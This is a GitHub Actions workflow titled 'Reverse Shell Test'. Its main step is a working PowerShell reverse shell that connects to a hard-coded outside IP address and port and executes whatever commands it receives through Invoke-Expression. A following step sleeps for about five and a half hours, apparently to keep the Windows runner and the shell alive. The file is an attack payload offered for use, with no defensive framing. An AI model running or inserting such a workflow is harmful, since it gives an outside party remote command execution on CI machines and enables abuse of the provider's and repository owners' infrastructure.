name: Reverse Shell Test

on:
  workflow_dispatch:

jobs:
  shell-test:
    runs-on: windows-latest

    steps:
      - name: Reverse shell using PowerShell
        run: |
          $client = New-Object System.Net.Sockets.TCPClient('147.185.221.30',34011)
          $stream = $client.GetStream()
          [byte[]]$bytes = 0..65535|%{0}
          while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
            $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
            try {
              $sendback = (Invoke-Expression $data 2>&1 | Out-String )
            } catch {
              $sendback = $_.Exception.Message
            }
            $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
            $stream.Write($sendbyte,0,$sendbyte.Length)
            $stream.Flush()
          }
      - name: 123
        run: |
          sleep 20000
